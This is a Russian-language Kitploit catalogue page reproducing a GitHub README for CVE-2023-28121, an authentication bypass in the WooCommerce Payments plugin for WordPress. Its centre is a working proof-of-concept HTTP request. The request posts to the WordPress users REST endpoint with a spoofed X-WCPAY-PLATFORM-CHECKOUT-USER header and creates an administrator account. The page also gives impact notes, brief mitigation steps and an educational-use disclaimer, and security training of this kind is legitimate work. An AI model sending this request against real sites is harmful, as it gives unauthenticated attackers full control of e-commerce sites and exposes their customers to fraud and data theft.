Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-28121-WordPress-Privilege-Escalation — Практическая эксплуатация критической уязвимости в WordPress с использованием плагина WooCommerce Payments. | Kitploit
Инструменты/GitHubGitHub/luisdevpentest/cve-2023-28121-wordpress-privilege-escalation
Аутентификация и авторизацияПовышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubluisdevpentest/cve-2023-28121-wordpress-privilege-escalation

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-28121-WordPress-Privilege-Escalation

Практическая эксплуатация критической уязвимости в WordPress с использованием плагина WooCommerce Payments.

Репозиторий
13 месяцев назадЕщё не проверено

🔐 CVE-2023-28121 — WordPress Privilege Escalation

Практическая эксплуатация критической уязвимости в WordPress с использованием плагина WooCommerce Payments.


📌 Краткое описание

CVE-2023-28121 позволяет создавать администраторов без аутентификации через REST API.

  • Серьезность: Критическая (CVSS 9.8)
  • Воздействие: Полный контроль над сайтом
  • Тип: Authentication Bypass / Privilege Escalation
  • +600 000 активных установок — март 2023 г. https://www.wiz.io/vulnerability-database/cve/cve-2023-28121?utm_source=chatgpt.com

📊 Затронутый плагин насчитывает сотни тысяч установок и широко используется в электронной коммерции.


🎥 Демонстрация

https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44


⚠️ Как это работает

Система принимает управляемый заголовок:

root@kitploit:~
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

Таким образом можно отправить запрос на создание пользователя с повышенными привилегиями без действительной аутентификации.


🧪 PoC

root@kitploit:~
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

{
  "username": "hacked",
  "password": "StrongPass123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

✔️ Результат: создание пользователя admin


🔥 Воздействие

  • Создание администратора
  • Доступ к панели /wp-admin
  • Возможный полный захват
  • Риск мошенничества и утечки данных

🛠️ Смягчение

  • Обновить плагин до исправленной версии
  • Ограничить доступ к REST API
  • Корректно проверять аутентификацию

🧱 Среда

  • WordPress (локальная лаборатория)
  • WooCommerce Payments (уязвимая версия)

📚 Ссылки

  • CVE-2023-28121
  • Документация REST API WordPress
  • https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/

👨‍💻 Автор

Luis Eduardo .M.B.S.R

Pentester / Web Security

LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/

GitHub: https://github.com/luisdevpentest

⚖️ Отказ от ответственности

Использование в образовательных целях в контролируемой среде. Я не несу ответственности за то, как третьи лица используют эти знания.

Скачать инструмент